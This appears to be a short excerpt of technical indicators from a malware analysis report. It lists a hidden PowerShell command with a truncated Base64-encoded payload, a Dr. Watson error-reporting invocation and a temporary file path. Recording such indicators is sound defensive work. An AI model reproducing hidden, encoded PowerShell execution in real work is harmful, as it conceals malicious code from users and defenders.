Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABKAGoAZgBiAGkAbwBoAGoAbwBmAGsAagBuAD0AJwBRAHoAcwBmAHcAcABvAHYAZQB6AGsAdABoACcAOwAkAFkAegBsAHQAeABoAHcAcQAgAD0AIAAnADYANwAzACcAOwAkAEQAdQBtAHUAagByAGkAeQBzAHI...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\1200536.cvr